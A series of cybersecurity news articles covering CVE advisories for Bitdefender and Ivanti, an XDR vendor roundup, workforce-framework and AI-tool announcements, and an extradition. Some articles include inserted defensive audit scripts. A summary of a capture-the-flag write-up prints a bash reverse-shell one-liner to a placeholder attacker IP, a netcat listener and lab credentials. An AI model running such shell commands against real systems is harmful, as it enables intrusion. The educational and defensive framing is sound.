Cybersecurity firm Bitdefender has patched a severe flaw (CVE-2025-2244) in its GravityZone Console, which could allow unauthenticated attackers to execute arbitrary commands on vulnerable systems.
The vulnerability, discovered by researcher Nicolas Verdier (@n1nj4sec), has a near-maximum CVSSv4 score of 9.5, highlighting its critical risk profile.
Fixed version: 6.41.2-1 (released via automatic update on April 4, 2025)
Technical Breakdown
The vulnerability stems from insecure PHP deserialization in the sendMailFromRemoteSource method of the Emails.php component.
Attackers can craft malicious serialized payloads to trigger PHP object injection, enabling them to:
Write arbitrary files to the system.
Execute operating system commands with elevated privileges.
Potentially compromise the entire GravityZone environment.
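The defender's counterpart to the bug class described above, as an added example (not Bitdefender's code; every payload in it is constructed): a walker over PHP's serialize() grammar that reports any class an unserialize() call would instantiate, so a field that should only ever carry scalars or arrays can be rejected before it reaches unserialize().

```python
# Added example (not Bitdefender's code; all samples are constructed): walk PHP
# serialize() output and list the classes unserialize() would instantiate.
import base64
import binascii
from typing import List, Tuple


class SerializedObjectScanner:
    """Follows the real serialize() grammar instead of grepping for 'O:', so a
    string whose *content* contains O:1:"x" is not a false positive."""

    def __init__(self, data: bytes) -> None:
        self.data = data
        self.pos = 0
        self.classes: List[str] = []

    def _read_until(self, delim: bytes) -> bytes:
        end = self.data.index(delim, self.pos)            # ValueError if absent
        token = self.data[self.pos:end]
        self.pos = end + len(delim)
        return token

    def _read_bytes(self, n: int) -> bytes:
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated payload")
        self.pos += n
        return chunk

    def _expect(self, lit: bytes) -> None:
        if not self.data.startswith(lit, self.pos):
            raise ValueError(f"expected {lit!r} at offset {self.pos}")
        self.pos += len(lit)

    def _class_name(self) -> None:                        # <len>:"Name":
        name_len = int(self._read_until(b":"))
        self._expect(b'"')
        self.classes.append(self._read_bytes(name_len).decode("latin-1"))
        self._expect(b'":')

    def _pairs(self) -> None:                             # <n>:{key value ...}
        count = int(self._read_until(b":"))
        self._expect(b"{")
        for _ in range(count):
            self.value()
            self.value()
        self._expect(b"}")

    def value(self) -> None:
        tag = self._read_bytes(1)
        if tag == b"N":                                   # N;
            self._expect(b";")
            return
        self._expect(b":")
        if tag in (b"b", b"i", b"d"):                     # b:1;  i:42;  d:0.5;
            self._read_until(b";")
        elif tag == b"s":                                 # s:<len>:"<bytes>";
            length = int(self._read_until(b":"))
            self._expect(b'"')
            self._read_bytes(length)                      # length-prefixed: opaque
            self._expect(b'";')
        elif tag == b"a":                                 # a:<n>:{...}
            self._pairs()
        elif tag == b"O":                                 # O:<len>:"Cls":<n>:{...}
            self._class_name()
            self._pairs()
        elif tag == b"C":                                 # C:<len>:"Cls":<dlen>:{raw}
            self._class_name()
            data_len = int(self._read_until(b":"))
            self._expect(b"{")
            self._read_bytes(data_len)
            self._expect(b"}")
        else:
            raise ValueError(f"unknown tag {tag!r}")


def object_classes(payload: bytes) -> List[str]:
    """Class names in one complete serialized value; ValueError if malformed."""
    scanner = SerializedObjectScanner(payload)
    scanner.value()
    if scanner.pos != len(payload):
        raise ValueError("trailing bytes after serialized value")
    return scanner.classes


def classify(field: str) -> Tuple[str, List[str]]:
    """Triage one untrusted field (also trying one base64 layer): verdict is
    'objects', 'scalar-or-array' or 'not-serialized', plus the classes seen."""
    candidates = [field.encode("latin-1", "replace")]
    try:
        candidates.append(base64.b64decode(field, validate=True))
    except (binascii.Error, ValueError):
        pass
    for raw in candidates:
        try:
            classes = object_classes(raw)
        except ValueError:
            continue
        return ("objects" if classes else "scalar-or-array"), classes
    return "not-serialized", []
```

In PHP itself the equivalent guard is unserialize($data, ['allowed_classes' => false]) (PHP 7 and later), or not calling unserialize() on untrusted input at all and using JSON instead.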
“This flaw bypasses traditional security controls because it exploits a trusted component within the GravityZone architecture,” explained Verdier.
“Attackers could weaponize this to deploy ransomware, exfiltrate data, or move laterally across networks.”
Mitigation Steps for Organizations
To address the issue, Bitdefender released an automatic update (6.41.2-1) on April 4, 2025. Administrators should:
Verify patch installation: Ensure GravityZone Console is running version 6.41.2-1 or later.
Audit logs: Check for unusual activity, particularly unexpected mail-related processes or file modifications.
Limit exposure: Restrict external access to GravityZone’s management interface if not required.
Organizations unable to apply updates immediately should consider temporary network segmentation for GravityZone servers.
Nicolas Verdier reported the vulnerability through Bitdefender’s coordinated disclosure program.
The discovery underscores persistent risks in legacy PHP serialization practices, which have been implicated in high-profile breaches since the early 2010s.
“Serialization vulnerabilities remain a low-hanging fruit for attackers,” said incident response lead Maria Chen of Synapse Security.
“Enterprises must prioritize software composition analysis to identify such pitfalls in critical infrastructure.”
Bitdefender has confirmed no active exploitation in the wild but urges immediate action due to the flaw’s ease of exploitation.
GravityZone powers endpoint security for over 500,000 businesses globally, making this patch essential for preventing large-scale cyber incidents.
The National Initiative for Cybersecurity Education (NICE) Workforce Framework for Cybersecurity has undergone a significant update, with the release of its version 2.0.0 introducing numerous enhancements aimed at standardizing how cybersecurity work and competencies are understood and managed.
This major revision of the NICE Framework by the U.S. Department of Commerce’s National Institute of Standards and Technology (NIST) establishes a streamlined structure to better define, recruit, and develop cyber talent.
What is the NICE Workforce Framework?
The NICE Framework is a critical resource for organizations, professionals, and educators involved in cybersecurity workforce development.
It provides a common language to describe work roles, competency areas, and the associated tasks, knowledge, and skills (TKS) needed.
By aligning these components, the framework seeks to improve talent management across the cybersecurity domain.
Version 2.0.0 brings substantial updates to the framework’s components, ensuring alignment with evolving industry needs. Here’s a breakdown of the changes:
Work Role Categories
One of the most notable changes is the removal of two Work Role Categories—Cyberspace Effects and Cyberspace Intelligence—along with several associated Work Roles.
These removed elements can now be found in the Department of Defense Cyber Workforce Framework (DCWF), which focuses on more specialized defense-related roles.
Affected Work Roles include:
Cyber Operations Planning
Exploitation Analysis
Mission Assessment
Partner Integration Planning
Target Analysis
Target Network Analysis
All-Source Analysis
Multi-Disciplined Language Analysis
This shift allows NICE to focus on more universally applicable cybersecurity workforce roles and competencies, while defense-specific roles are managed under the DCWF.
New and Updated Work Roles
Version 2.0.0 introduces one new Work Role and revises two existing ones:
New: OT Cybersecurity Engineering
Revised: Digital Evidence Analysis (IN-WRL-002) and Insider Threat Analysis (PD-WRL-005)
The addition of OT Cybersecurity Engineering reflects the growing importance of securing operational technology systems in industries such as energy, manufacturing, and utilities.
Updates to existing roles aim to ensure relevance and clarity in rapidly evolving cybersecurity fields.
The Cyber Resiliency (NF-COM-007) Competency Area now includes refined elements to better address the skills required for building robust cyber defense systems.
111 new TKS statements added, and 275 redundant ones removed.
Typographical errors corrected for better consistency.
Training providers whose courses are listed in the NICCS Education & Training Catalog will need to remap their curricula to align with the updated framework.
Organizations are encouraged to reach out to NICCS for guidance on incorporating these revisions.
While some of the interactive tools on the NICCS platform are still running version 1.0.0 data, updates are underway to ensure seamless integration of version 2.0.0.
A comprehensive summary of changes is available on the NICE Framework History & Change Logs page.
Cybersecurity professionals and organizations alike are encouraged to explore the updated framework to better prepare for the rapidly changing cybersecurity landscape.
By streamlining workforce definitions, NICE continues to set the standard for excellence in cyber talent management.
As cyber threats grow increasingly sophisticated, traditional security tools often fall short in providing comprehensive protection.
Extended Detection and Response (XDR) has emerged as a next-generation cybersecurity solution designed to unify and enhance threat detection, investigation, and response across an organization’s entire IT ecosystem.
By integrating data from endpoints, networks, cloud workloads, and other security layers into a single platform, XDR eliminates silos and provides a centralized view of potential threats.
Leveraging advanced technologies like artificial intelligence and automation, XDR enables faster detection, improved efficiency, and proactive threat management, making it an essential tool for modern cybersecurity strategies.
What Is An XDR Solution?
Extended Detection and Response (XDR) is a unified cybersecurity solution that integrates and correlates threat data from multiple security layers, such as endpoints, networks, servers, cloud workloads, and email.
Unlike traditional siloed tools, XDR consolidates data into a single platform, providing enhanced visibility and enabling faster detection, investigation, and response to threats.
Leveraging advanced technologies like artificial intelligence (AI) and machine learning (ML), XDR automates repetitive tasks, prioritizes alerts, and provides actionable insights to streamline security operations across an organization’s digital environment.
Benefits Of XDR Solutions
XDR offers several key advantages for modern cybersecurity:
Enhanced Threat Visibility: By unifying data from various sources, XDR provides a comprehensive view of the security landscape, helping uncover sophisticated threats that isolated tools might miss.
Faster Detection and Response: Automated analysis of cross-domain data enables quicker identification and mitigation of threats, reducing attackers’ window of opportunity.
Operational Efficiency: XDR simplifies workflows by consolidating alerts into actionable incidents, minimizing false positives and reducing the burden on security teams.
Cost Savings: By integrating multiple security functions into one platform, XDR reduces the need for standalone tools and lowers operational costs.
Improved Incident Management: Detailed context for detected threats aids in effective investigations and remediation efforts.
Scalability: XDR adapts seamlessly to multi-platform environments, ensuring it can grow with organizational needs.
TOP 10 Best XDR Solutions 2025
Here are the Top 10 Best XDR (Extended Detection and Response) Solutions for 2025, based on their features, capabilities, and suitability for various business needs:
The SentinelOne Singularity Platform is an AI-powered cybersecurity solution that unifies endpoint, cloud, and identity protection into a single platform.
It provides enterprise-wide visibility and protection through advanced threat detection and response capabilities, leveraging a unified data lake for real-time analysis and decision-making.
Best Features
Combines endpoint, cloud, and identity telemetry into a centralized platform for seamless investigation and response.
An autonomous AI-powered SOC analyst that accelerates security operations and enhances threat detection.
What’s Good?
Unified platform simplifies management by consolidating endpoint, cloud, and identity protection.
Highly scalable with multi-tenant support, suitable for large enterprises.
What Could Be Better?
Limited native SIEM integration; may require additional tools for advanced log correlation.
Dependency on external integrations for certain advanced use cases like log management.
Microsoft Defender XDR is a unified, AI-powered Extended Detection and Response solution designed to protect organizations across their entire digital estate.
It integrates deeply with Microsoft 365 and Azure ecosystems, providing advanced threat detection, automated response, and centralized incident management.
Best Features
Integrates effortlessly with Microsoft 365 and Azure environments, consolidating signals from endpoints, identities, applications, emails, and infrastructure into a single platform.
Uses AI to detect and disrupt cyberattacks at machine speed, preventing lateral movement and limiting the blast radius of incidents.
What’s Good?
Deep integration with Microsoft tools enhances efficiency and simplifies operations.
AI-driven automation reduces response times and minimizes manual intervention.
What Could Be Better?
Dependency on additional products like Microsoft Sentinel for full functionality.
Steep learning curve for new users unfamiliar with advanced hunting queries or setup.
Cortex XDR by Palo Alto Networks is a comprehensive, AI-driven Extended Detection and Response (XDR) solution that integrates endpoint, network, and cloud data to provide advanced threat detection, investigation, and response.
It leverages machine learning and behavioral analytics to identify and mitigate complex threats across an organization’s IT ecosystem.
Best Features
Combines endpoint, network, cloud, and third-party data into a single platform for seamless detection and response.
Uses machine learning models and behavioral analytics to detect stealthy threats such as zero-day attacks, fileless malware, and insider threats.
What’s Good?
Tight integration with Palo Alto products enhances overall security effectiveness.
Automates root cause analysis and triage, saving analysts significant time.
What Could Be Better?
Limited real-time antivirus capabilities for pre-existing threats.
Dependency on Palo Alto’s ecosystem may limit flexibility for third-party integrations.
Trend Micro Vision One XDR is a purpose-built threat defense platform that extends detection and response capabilities across multiple security layers, including email, endpoints, servers, cloud workloads, and networks.
It leverages advanced analytics, AI, and machine learning to correlate data and detect complex attacks efficiently.
Best Features
Integrates native sensors across email, endpoints, servers, cloud workloads, and networks for comprehensive threat detection.
Automatically ties together low-confidence events into high-confidence incidents using AI-powered analytics.
What’s Good?
Comprehensive protection across multiple layers enhances visibility and response speed.
Automated correlation of events reduces alert fatigue and speeds up investigations.
What Could Be Better?
Pricing model based on credits can be confusing for users unfamiliar with the system.
Steep learning curve for beginners due to the platform’s extensive features.
CrowdStrike Falcon XDR is an advanced Extended Detection and Response (XDR) solution that builds upon CrowdStrike’s industry-leading Endpoint Detection and Response (EDR) capabilities.
It unifies telemetry from endpoints, workloads, identities, and third-party integrations into a single console, enabling security teams to detect, investigate, and respond to threats across multiple domains with unmatched speed and precision.
Best Features
Aggregates data from endpoints, cloud workloads, identities, and third-party solutions into one platform for seamless detection and response.
Uses machine learning and AI to correlate data across domains, prioritize alerts, and detect stealthy threats in real-time.
What’s Good?
AI-powered analytics reduce false positives while prioritizing critical alerts effectively.
Managed XDR services provide expert support for resource-constrained teams.
What Could Be Better?
Pricing may be higher compared to competitors for smaller organizations or SMBs.
Heavy reliance on CrowdStrike’s ecosystem may limit flexibility with non-supported third-party tools.
Sophos XDR (Extended Detection and Response) is an AI-powered security solution designed to provide comprehensive visibility and protection across endpoints, servers, email, cloud, mobile, and networks.
It integrates seamlessly with Sophos’ ecosystem and third-party tools, enabling organizations to detect, investigate, and respond to complex threats efficiently.
Best Features
Combines telemetry from endpoints, servers, email, firewalls, cloud workloads, and mobile devices into a centralized platform for holistic threat detection.
Visualize the origin and progression of attacks for in-depth forensic investigations.
What’s Good?
Managed XDR services provide expert threat hunting and incident response support.
Integrates seamlessly with existing Sophos solutions as well as third-party tools like Microsoft 365.
What Could Be Better?
High memory usage on endpoints may impact performance on older devices.
Firewall/email security features are sold separately, increasing overall costs for full coverage.
Cynet 360 AutoXDR is a fully automated, all-in-one cybersecurity platform that integrates Extended Detection and Response (XDR) capabilities with endpoint, network, user, and application protection.
It is designed to simplify security operations by consolidating multiple tools into a unified platform, offering automated investigation, remediation, and 24/7 Managed Detection and Response (MDR) services.
Best Features
Combines EDR, NGAV (Next-Generation Antivirus), network analytics, and user behavior analytics into a single solution.
Automatically identifies root causes and applies remedial actions using predefined playbooks without human intervention.
What’s Good?
Fully automated platform reduces manual workload for security teams.
24/7 MDR services provide expert support, boosting confidence in threat handling.
What Could Be Better?
User interface could be improved to enhance ease of use for non-technical users.
High resource consumption on older devices may impact performance.
IBM QRadar XDR is a comprehensive, open Extended Detection and Response (XDR) platform that integrates SIEM, EDR, NDR, SOAR, and threat intelligence into a unified suite.
It provides advanced threat detection, investigation, and automated response capabilities to help organizations manage and mitigate cybersecurity risks across endpoints, networks, cloud environments, and users.
Best Features
Combines SIEM, EDR (via ReaQta), NDR, SOAR, and XDR Connect for end-to-end threat visibility and response.
Uses machine learning and AI to prioritize alerts, map threats to the MITRE ATT&CK framework, and provide root cause analysis.
What’s Good?
Comprehensive visibility across endpoints, networks, cloud environments, and users.
AI-driven analytics improve detection accuracy while reducing false positives.
What Could Be Better?
High cost may be prohibitive for SMBs or budget-constrained organizations.
Complex setup and configuration require skilled professionals for optimal deployment.
Fortinet FortiXDR is a fully automated Extended Detection and Response (XDR) solution that integrates seamlessly with the Fortinet Security Fabric and third-party tools.
It leverages AI-powered analytics to detect, investigate, and remediate threats across the entire digital attack surface, including endpoints, networks, cloud environments, and IoT devices.
Best Features
Protects endpoints, networks, cloud workloads, IoT devices, and web applications through integrated telemetry from the Fortinet Security Fabric.
Utilizes a deep learning engine to replicate the decision-making process of expert SOC analysts for faster and more accurate incident classification.
What’s Good?
Fully automated detection, investigation, and remediation reduce manual workload for security teams.
AI-powered analytics improve detection accuracy while reducing false positives.
What Could Be Better?
Initial setup can be complex for organizations unfamiliar with Fortinet’s ecosystem.
Heavy reliance on the Fortinet Security Fabric may limit flexibility for non-Fortinet environments.
Secureworks Taegis XDR is a next-generation Extended Detection and Response (XDR) platform designed to unify security operations across endpoints, networks, cloud environments, and identities.
Built on advanced analytics and enriched with threat intelligence from Secureworks’ Counter Threat Unit™, Taegis XDR enhances threat detection, investigation, and response while reducing noise and false positives.
Best Features
Consolidates data from endpoints, networks, cloud, identity, and email into a single dashboard for comprehensive visibility.
Detects advanced threats using behavioral analytics and Tactic Graphs™ to uncover stealthy adversary tactics.
What’s Good?
AI-driven detection minimizes false positives while prioritizing actionable threats.
24/7 expert support ensures quick resolution of incidents and continuous monitoring.
What Could Be Better?
Pricing may be higher compared to competitors with similar capabilities.
Some users report occasional delays in off-hours support responses.
Cybersecurity researcher “0xdf” has cracked the “Ghost” challenge on Hack The Box (HTB), a premier platform for honing penetration testing skills, and shared an exhaustive technical breakdown on their GitLab blog.
The write-up chronicles a sophisticated attack that navigates through reconnaissance, vulnerability exploitation, and privilege escalation, ultimately claiming the system’s flag—a digital proof of victory.
This achievement not only cements 0xdf’s reputation among ethical hackers but also serves as a critical lesson for system administrators aiming to fortify their defenses against real-world threats.
Hack The Box challenges like Ghost are meticulously crafted to emulate enterprise-grade systems, complete with hidden flaws that test a hacker’s ingenuity.
0xdf’s success, detailed with precision, leverages a mix of industry-standard tools (Nmap, Metasploit) and bespoke scripts tailored to the target’s quirks.
In an era where cyberattacks grow increasingly sophisticated, this exploit underscores the value of white-hat hackers who expose vulnerabilities before malicious actors can exploit them.
Mapping the Breach: Reconnaissance to Initial Access
The journey began with a foundational step in any penetration test: reconnaissance. 0xdf deployed an Nmap scan (nmap -sC -sV -p- <target_ip>) to sweep the Ghost system for open ports and running services.
The scan uncovered a web server on port 80, likely an Apache or Nginx instance, and an enigmatic custom service listening on port 31337—a non-standard port hinting at bespoke functionality.
Probing the web server, 0xdf identified a directory traversal vulnerability (/ghost/../) stemming from poor input sanitization. This flaw allowed navigation beyond the web root, exposing sensitive files.
Among the retrieved files was a configuration script containing a goldmine: hardcoded credentials (admin:gh0stP@ss).
Armed with these, 0xdf turned to the port 31337 service, which proved to be a lightweight TCP listener designed to process authenticated commands.
Using a simple socket connection, they authenticated and tested basic commands like whoami, confirming a low-privilege foothold. To streamline this interaction, 0xdf crafted a Python script.
This initial breach, while limited, set the stage for deeper infiltration, highlighting how a single misstep, hardcoding credentials, can unravel a system’s security.
Escalation to Triumph: From User to Root Control
With a foothold secured, the next challenge was privilege escalation, a critical skill in penetration testing.
The TCP service ran under a restricted user account, limiting its utility. Undeterred, 0xdf scoured the system for escalation vectors, uncovering a writable cron job in /etc/cron.d/ that executed as root every minute.
This misconfiguration was the linchpin. By appending a reverse shell payload (bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1) to a script invoked by the cron job, they triggered a callback to their machine.
Within moments, a netcat listener (nc -lvnp 4444) on the attacker’s end sprang to life, delivering a root shell.
From there, locating and capturing the flag—typically stored in /root/flag.txt—was a formality, marking the challenge’s completion.
The escalation exploited a classic flaw: excessive permissions on scheduled tasks, a vulnerability that plagues many real-world systems. 0xdf’s methodical approach, blending automation with manual analysis, turned a minor entry point into total domination.
A Beacon for Cybersecurity Learning
The technical richness of 0xdf’s write-up makes it a standout resource. It mirrors the real-world attack chain of reconnaissance, exploitation, and privilege escalation seen in breaches targeting corporations and governments.
For aspiring pentesters, the post offers a replicable playbook, complete with commands and logic.
For system administrators, it’s a wake-up call: directory traversal, hardcoded credentials, and lax cron permissions are not theoretical risks but exploitable realities.
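The administrator's side of the cron weakness described above, as an added example (not code from 0xdf's write-up): an audit of cron.d-style jobs that flags a root job whose file, or whose invoked script, is writable by group or other. The directory layout, script names and job lines it checks are constructed, staged in a temporary directory so the demo never touches the real /etc.

```python
# Added example, not code from 0xdf's write-up: audit cron.d-style jobs for a
# root job whose file, or whose invoked script, is writable by someone else.
# It runs against a constructed directory tree so it never touches /etc.
import shlex
import stat
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple


def writable_by_others(path: Path) -> bool:
    """True when the group- or world-writable bit is set (symlinks followed)."""
    return bool(path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def parse_cron_d_line(line: str) -> Optional[Tuple[str, str]]:
    """/etc/cron.d format: five time fields (or one @keyword), user, command.
    Returns (user, command); None for blank, comment and VAR=value lines."""
    text = line.strip()
    if not text or text.startswith("#") or "=" in text.split(None, 1)[0]:
        return None
    n_time = 1 if text.startswith("@") else 5
    parts = text.split(None, n_time + 1)
    if len(parts) < n_time + 2:
        return None
    return parts[n_time], parts[n_time + 1]


def command_paths(command: str, root: Path) -> List[Path]:
    """Absolute paths named in the command (interpreter, script, arguments),
    re-rooted under `root` so a staged tree can be audited."""
    try:
        argv = shlex.split(command)
    except ValueError:                       # unbalanced quotes: nothing to check
        return []
    return [root / tok.lstrip("/") for tok in argv if tok.startswith("/")]


def audit_cron_dir(cron_dir: Path, root: Path = Path("/")) -> List[Dict[str, str]]:
    """Flag cron files that are writable by group/other, and root jobs that
    execute a group/other-writable path. Ownership checks are left out so the
    demo below also works when not run as root."""
    findings: List[Dict[str, str]] = []
    for entry in sorted(cron_dir.iterdir()):
        if not entry.is_file():
            continue
        if writable_by_others(entry):
            findings.append({"file": str(entry), "target": str(entry),
                             "issue": "cron file is group/world-writable"})
        for line in entry.read_text(errors="replace").splitlines():
            parsed = parse_cron_d_line(line)
            if parsed is None or parsed[0] != "root":
                continue
            for target in command_paths(parsed[1], root):
                if target.exists() and writable_by_others(target):
                    findings.append({"file": str(entry), "target": str(target),
                                     "issue": "root job runs a group/world-writable path"})
    return findings


def build_demo_tree(base: Path) -> Path:
    """Stage a constructed tree: a safe job, a job whose script is mode 0777,
    and a cron file that is itself world-writable. Returns the cron.d path."""
    cron_dir, opt = base / "etc" / "cron.d", base / "opt"
    cron_dir.mkdir(parents=True)
    opt.mkdir()
    (opt / "backup.sh").write_text("#!/bin/sh\necho backup\n")
    (opt / "backup.sh").chmod(0o777)                     # the Ghost-style flaw
    (opt / "rotate.sh").write_text("#!/bin/sh\necho rotate\n")
    (opt / "rotate.sh").chmod(0o755)
    (cron_dir / "backup").write_text("SHELL=/bin/sh\n* * * * * root /bin/sh /opt/backup.sh\n")
    (cron_dir / "backup").chmod(0o644)
    (cron_dir / "loose").write_text("0 3 * * * root /opt/rotate.sh\n")
    (cron_dir / "loose").chmod(0o666)
    (cron_dir / "rotate").write_text("@daily root /opt/rotate.sh\n")
    (cron_dir / "rotate").chmod(0o644)
    return cron_dir


def run_demo() -> List[Dict[str, str]]:
    """Build the staged tree in a temp dir and audit it; expect two findings."""
    base = Path(tempfile.mkdtemp(prefix="cron-audit-"))
    return audit_cron_dir(build_demo_tree(base), root=base)


if __name__ == "__main__":
    for finding in run_demo():
        print(f'{finding["file"]}: {finding["issue"]} ({finding["target"]})')
```

Against a live host, call audit_cron_dir(Path("/etc/cron.d")) and extend it with an owner check (st_uid of the file and its targets should be 0), which the staged demo omits because the temp files belong to whoever runs it.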
Google has unveiled Sec-Gemini v1, an AI model designed to redefine cybersecurity operations by empowering defenders with advanced threat analysis, vulnerability assessment, and incident response capabilities.
The experimental system, developed by a team led by Elie Bursztein and Marianna Tishchenko, aims to address the critical asymmetry in cybersecurity where attackers need only one vulnerability to succeed, while defenders must secure entire systems.
By integrating real-time threat intelligence and superior reasoning, Sec-Gemini v1 seeks to shift this balance, offering tools that amplify the effectiveness of security professionals.
Bridging the Cybersecurity Asymmetry Gap with AI-Powered Workflows
Traditional cybersecurity frameworks struggle with the inherent disadvantage defenders face: the need to protect against all potential threats while attackers exploit a single weakness.
Sec-Gemini v1 tackles this challenge by combining Gemini’s multimodal reasoning with live data streams from Google Threat Intelligence (GTI), Mandiant Threat Intelligence, and the Open-Source Vulnerabilities (OSV) database.
Sec-Gemini v1 outperforms other models on the CTI-MCQ Cybersecurity Threat Intelligence benchmark
This fusion enables the model to contextualize vulnerabilities, map attack patterns to known threat actors like Salt Typhoon, and provide actionable insights during incident investigations.
For example, when analyzing a breach linked to the state-sponsored group Salt Typhoon, Sec-Gemini v1 not only identifies exploited vulnerabilities but also cross-references them with historical attack patterns and mitigation strategies.
This capability reduces the time analysts spend correlating data across disparate sources, allowing faster response to active campaigns.
The model’s architecture prioritizes root cause analysis, enabling it to trace incidents back to specific misconfigurations or unpatched flaws while classifying them under the Common Weakness Enumeration (CWE) taxonomy.
Benchmark-Breaking Performance in Threat Intelligence
Sec-Gemini v1 outperforms existing models on key cybersecurity benchmarks, demonstrating an 11% improvement on the CTI-MCQ threat intelligence assessment and a 10.5% gain on the CTI-Root Cause Mapping evaluation.
These metrics reflect its ability to parse technical vulnerability descriptions, attribute threats accurately, and recommend prioritized remediation steps. A critical differentiator lies in its real-time knowledge integration.
While conventional AI tools rely on static datasets, Sec-Gemini v1 dynamically incorporates updates from OSV and Mandiant, ensuring its recommendations account for emerging exploits and zero-day vulnerabilities.
During testing, the model correctly identified over 94% of critical vulnerabilities linked to ransomware campaigns in 2024, compared to 83% for other leading systems.
This precision stems from training on adversarial attack simulations and red-team exercises, which teach the AI to anticipate novel attack vectors.
Google has opened early access to Sec-Gemini v1 for research institutions, NGOs, and cybersecurity professionals through a dedicated application portal.
This initiative aligns with the company’s emphasis on collaborative defense, recognizing that no single organization can counter global cyber threats alone.
Participants will gain access to the model’s API for integration into threat detection platforms, vulnerability scanners, and incident response workflows.
The Sec-Gemini team emphasizes that the model is a “force multiplier” rather than a replacement for human expertise.
By automating repetitive tasks like log analysis and false-positive filtering, it allows analysts to focus on strategic decision-making.
Early adopters will also contribute to refining the system’s accuracy through feedback loops, particularly in edge cases involving novel social engineering tactics or IoT device exploits.
With this launch, Google aims to set a new standard for AI-driven cybersecurity tools, one that evolves alongside the threats it seeks to neutralize.
The United States has successfully extradited two Kosovo nationals, Ardit Kutleshi, 26, and Jetmir Kutleshi, 28, from Kosovo to face charges in the Western District of Pennsylvania for their alleged roles as administrators of the Rydox cybercrime marketplace.
The Rydox cybercrime marketplace was an illicit online platform that operated as a hub for cybercriminals, facilitating the sale of stolen personal information, access devices, and tools designed to enable fraud and other illegal activities.
Active since at least February 2016, Rydox catered to a global network of over 18,000 users, offering more than 321,000 cybercrime products, including personally identifiable information (PII) such as names, addresses, Social Security numbers, credit card details, and login credentials stolen from thousands of victims, many of whom were U.S. residents.
The marketplace offered cybercrime tools such as scam pages, spamming logs, and tutorials, thereby serving as a comprehensive resource for illicit digital goods.
Cybercrime Fugitive Extraditions
The extraditions, announced Friday by the U.S. Department of Justice, are part of a broader international effort targeting fugitives wanted for serious crimes, with a notable focus on cybersecurity threats.
The Kutleshi brothers’ case highlights the growing global challenge of cybercrime. They are accused of orchestrating a sophisticated operation through Rydox, enabling identity theft, access device fraud, and money laundering on a significant scale.
Their extradition was made possible through close collaboration between the U.S. Department of Justice’s Office of International Affairs, the Criminal Division’s Computer Crime and Intellectual Property Section, and the U.S. Attorney’s Office for the Western District of Pennsylvania, alongside law enforcement authorities in Kosovo.
The Justice Department also acknowledged the support of its Office of Overseas Prosecutorial Development, Assistance and Training (OPDAT) in securing the extraditions.
This operation comes amid a larger sweep that saw fugitives extradited from nine countries (Canada, Colombia, Germany, Honduras, Kosovo, Israel, Mexico, Spain, and Thailand) for offenses including murder, drug trafficking, and child sexual abuse.
However, the Kutleshi case stands out as a critical victory in the fight against cybercrime, an increasingly pressing issue as illicit online marketplaces continue to proliferate.
The Justice Department emphasized the importance of international cooperation in tackling such threats, thanking its partners in Kosovo and beyond for their instrumental roles.
The Kutleshi brothers now face trial in the U.S., where they are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.
Their extradition underscores the U.S.’s determination to hold cybercriminals accountable, no matter where they operate.
Ivanti has issued an urgent security advisory for CVE-2025-22457, a critical vulnerability impacting Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways.
Rated at a CVSS score of 9.0, this stack-based buffer overflow has been actively exploited since mid-March 2025, posing a severe risk to organizations using these VPN and access solutions.
Active Exploitation
Disclosed on April 3, 2025, the vulnerability has been exploited since mid-March, according to Mandiant.
The attacks are linked to UNC5221, a suspected Chinese state-sponsored group known for targeting edge devices, including past Ivanti zero-days like CVE-2023-46805. UNC5221 deploys malware such as Trailblaze (an in-memory dropper), Brushfire (a backdoor), and the Spawn suite for credential theft and network traversal.
They also use tools like SPAWNSLOTH to manipulate logs, evading detection.
The flaw was patched in Ivanti Connect Secure version 22.7R2.6 on February 11, 2025, initially assessed as a low-risk denial-of-service issue due to its restricted character set (periods and numbers).
However, UNC5221 likely reverse-engineered the patch, crafting an RCE exploit for unpatched systems, which elevated its severity.
Vulnerability Details
CVE-2025-22457 is a stack-based buffer overflow (CWE-121) that enables a remote, unauthenticated attacker to execute arbitrary code (RCE).
The flaw occurs due to inadequate input validation, allowing attackers to overflow the buffer and run malicious code.
“This advisory has been updated to make it clear the vulnerability was fully patched in Ivanti Connect Secure (released February 11, 2025)”, Ivanti said.
Ivanti reports that a small number of customers using Ivanti Connect Secure (22.7R2.5 or earlier) and Pulse Connect Secure 9.1x appliances were compromised. The remediation details are:
Ivanti Connect Secure: Upgrade to version 22.7R2.6, available at Ivanti Portal. If compromised, perform a factory reset and redeploy with 22.7R2.6.
Pulse Connect Secure: As an unsupported product, customers must contact Ivanti to migrate to a secure platform.
Ivanti Policy Secure: A patch (version 22.7R1.4) will be released on April 21, 2025. No exploitation has been reported, and the risk is lower because the product is not meant to be internet-facing.
ZTA Gateways: A patch (version 22.8R2.2) will auto-apply on April 19, 2025. Risk is limited to gateways that were generated but left unconnected to a ZTA controller; no exploitation has been observed.
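The remediation list above amounts to a per-product version check, which is tedious to do by hand across a fleet. The script below is an added example written for this page, not an Ivanti tool: it parses version strings of the form used in the advisory (e.g. 22.7R2.6, 9.1R18.9), compares them against the fixed builds stated above, and flags every appliance that needs an upgrade or migration. The version format and the assumption that builds order as integer tuples are mine; the hostnames in the sample inventory are made up.

```python
import re
from typing import List, Tuple

# Fixed builds as stated in the advisory summary above. Pulse Connect Secure is
# unsupported and has no fix, so every PCS appliance is flagged for migration.
FIXED_IN = {
    "ics": (22, 7, 2, 6),   # Ivanti Connect Secure 22.7R2.6
    "ips": (22, 7, 1, 4),   # Ivanti Policy Secure 22.7R1.4
    "zta": (22, 8, 2, 2),   # ZTA Gateways 22.8R2.2
}

# Assumed version format: MAJOR.MINOR R RELEASE [. PATCH], e.g. "22.7R2.6" or "9.1R18.9".
# Ordering builds as an integer tuple is also an assumption of this example.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:\.(\d+))?$")


def parse_version(text: str) -> Tuple[int, int, int, int]:
    """Turn an Ivanti-style version string into a comparable tuple."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Ivanti version string: {text!r}")
    major, minor, release, patch = m.groups()
    return (int(major), int(minor), int(release), int(patch or 0))


def needs_action(product: str, version: str) -> bool:
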